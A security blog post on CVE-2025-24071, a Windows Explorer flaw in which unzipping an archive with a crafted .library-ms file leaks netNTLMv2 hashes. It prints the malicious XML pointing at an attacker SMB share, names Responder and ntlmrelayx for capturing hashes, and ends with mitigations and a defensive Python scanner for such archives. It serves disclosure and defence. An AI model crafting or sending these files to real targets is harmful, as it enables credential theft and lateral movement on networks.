CVE-2025-24071 - Leaking netNTLMv2 Credentials with a Simple ZIP

In this blog post, a proof-of-concept (PoC) is presented that demonstrates how a malicious .library-ms file can be used to capture netNTLMv2 credentials without the victim ever interacting with the file: simply unzipping the archive is enough to trigger the vulnerability.

Vulnerability Description

CVE-2025-24071 is a critical flaw in Windows Explorer, the default file manager of the Windows operating system. It stems from insecure handling of compressed (ZIP) archives that contain a Windows library file with the .library-ms extension. When a user unzips a malicious ZIP archive, Windows Explorer automatically processes the embedded .library-ms file, which triggers a Server Message Block (SMB) connection to a remote server controlled by an attacker.

The most concerning aspect of this vulnerability is that it requires no user interaction beyond the extraction itself (the victim never has to click on the file), because the malicious action runs in the background during decompression. As a result, the victim’s system sends its authentication credentials in netNTLMv2 format to the attacker, who could then use them in an authentication relay attack (NTLM Relay) or attempt to recover the password by cracking the captured hash offline.

Potential impact:

  • Credential theft: An attacker could capture NTLMv2 hashes and, in environments with weak password policies, crack them offline.

  • Lateral movement on corporate networks: If the affected user has privileges on an internal network, the attacker could escalate access.

  • Remote Code Execution (RCE): In combination with other vulnerabilities, RCE could be achieved.

Proof of Concept (PoC)

1. Preparation of the Malicious File

To exploit this vulnerability, we must first create a .library-ms file with the following malicious XML content:

<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
  <searchConnectorDescriptionList>
    <searchConnectorDescription>
      <simpleLocation>
        <url>\\192.168.0.1\shared</url>
      </simpleLocation>
    </searchConnectorDescription>
  </searchConnectorDescriptionList>
</libraryDescription>

This XML file contains a reference to a remote SMB resource (\\ATTACKER-IP\shared, shown above with the example address 192.168.0.1) that the system will automatically try to contact when Windows Explorer processes the file. We then compress this file in ZIP format for distribution.

Creation of the malicious file

2. Distribution and Execution

The attack vector is surprisingly simple: the attacker distributes the ZIP file to the victim via any means (email, messaging, download sites, etc.). What is critical about this vulnerability is that it does not require the user to open the malicious file. By simply unzipping the ZIP, Windows Explorer automatically processes the contained .library-ms file and attempts to establish an SMB connection to the server controlled by the attacker.

Malicious ZIP decompression process

3. Credential Capture

On the attacker’s server, an SMB listener is configured using tools such as Responder, ntlmrelayx or Inveigh to intercept and log the netNTLMv2 hashes sent by the victim’s system during the authentication attempt. These hashes can subsequently be:

  • Subjected to offline brute-force attacks to recover the password in clear text.
  • Used in NTLM Relay attacks to escalate privileges or move laterally in the network.
  • Exploited to establish authenticated sessions on systems that accept this type of authentication.

Successful netNTLMv2 credential capture

Mitigation

To protect systems against the vulnerability CVE-2025-24071, the following measures are recommended:

  1. Install security updates: Immediately apply the security patches released by Microsoft for this specific vulnerability.

  2. Configure group policies:

    • Block outbound SMB in corporate environments where possible.
    • Implement firewall rules that block unauthorised outbound SMB connections.

  3. Good security practices:

    • Avoid unzipping ZIP files from untrusted sources.
    • Use up-to-date anti-virus solutions that can detect this type of threat.
    • Consider using isolated environments to examine suspicious files.

  4. Network monitoring: Implement intrusion detection systems capable of identifying attempts to exploit this vulnerability.
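The measures above can be complemented by inspecting archives before they ever reach a user's Explorer. The following Python script is an added example, not part of the original post: it scans a ZIP file for .library-ms entries whose <url> element is a UNC path, which is exactly the indicator described in the PoC. A mail gateway or upload pipeline could run this kind of check. The archive contents are constructed in memory for the demonstration, and the 192.168.0.1 address is the placeholder from the post's own XML, not a real indicator.

```python
"""Scan ZIP archives for .library-ms entries that point at remote (UNC) shares.

Added example (not the post's code): a defensive pre-delivery check for the
indicator the post describes. All sample data below is constructed in memory.
"""
import io
import zipfile
import xml.etree.ElementTree as ET


def local_name(tag: str) -> str:
    """Strip an XML namespace prefix: '{http://...}url' -> 'url'."""
    return tag.rsplit("}", 1)[-1]


def find_remote_locations(library_xml: bytes) -> list[str]:
    """Return every <url> value in a .library-ms body that is a UNC path.

    Explorer resolves a <simpleLocation><url> of the form \\host\share over
    SMB, so any such value inside an untrusted archive is worth flagging.
    Both namespaced and un-namespaced <url> elements are inspected, and
    forward-slash UNC spellings (//host/share) are treated the same way.
    """
    root = ET.fromstring(library_xml)
    hits = []
    for element in root.iter():
        if local_name(element.tag) != "url":
            continue
        value = (element.text or "").strip()
        if value.startswith(("\\\\", "//")):
            hits.append(value)
    return hits


def scan_zip(data: bytes) -> list[tuple[str, str]]:
    """Return (entry name, indicator) pairs for suspicious .library-ms entries.

    A .library-ms that does not parse as XML is reported as well: it is still
    an unexpected file type to find in an archive from an untrusted source.
    """
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as archive:
        for info in archive.infolist():
            if info.is_dir() or not info.filename.lower().endswith(".library-ms"):
                continue
            try:
                urls = find_remote_locations(archive.read(info))
            except ET.ParseError:
                findings.append((info.filename, "<unparseable XML>"))
                continue
            findings.extend((info.filename, url) for url in urls)
    return findings


# Constructed samples. The benign library points at a local folder; the
# suspicious one reuses the placeholder UNC path from the post's XML.
BENIGN_XML = b"""<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
  <searchConnectorDescriptionList>
    <searchConnectorDescription>
      <simpleLocation>
        <url>C:\\Users\\Public\\Documents</url>
      </simpleLocation>
    </searchConnectorDescription>
  </searchConnectorDescriptionList>
</libraryDescription>"""

SUSPICIOUS_XML = BENIGN_XML.replace(
    b"C:\\Users\\Public\\Documents", b"\\\\192.168.0.1\\shared"
)


def build_sample_zip() -> bytes:
    """Build an in-memory archive with one benign and one suspicious library file."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as archive:
        archive.writestr("notes.txt", "nothing to see here")
        archive.writestr("Music.library-ms", BENIGN_XML)
        archive.writestr("docs/report.library-ms", SUSPICIOUS_XML)
    return buf.getvalue()


SAMPLE_ZIP = build_sample_zip()

if __name__ == "__main__":
    for entry, indicator in scan_zip(SAMPLE_ZIP):
        print(f"SUSPICIOUS {entry}: remote location {indicator}")
```

The check keys on the file extension and the <url> content rather than on a specific hostname or IP, because the remote location is entirely attacker-chosen; blocking a single address from a published sample would miss every other variant. Pair it with the outbound SMB block from the list above so that a file which slips past the scanner still cannot complete the authentication attempt.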

Microsoft has classified this vulnerability as critical and recommends updating all affected systems with high priority.

Conclusion

Vulnerability CVE-2025-24071 highlights the importance of keeping systems up to date and being cautious when handling compressed files from unknown sources. Exploitation of this vulnerability can occur without the user directly interacting with the malicious file.
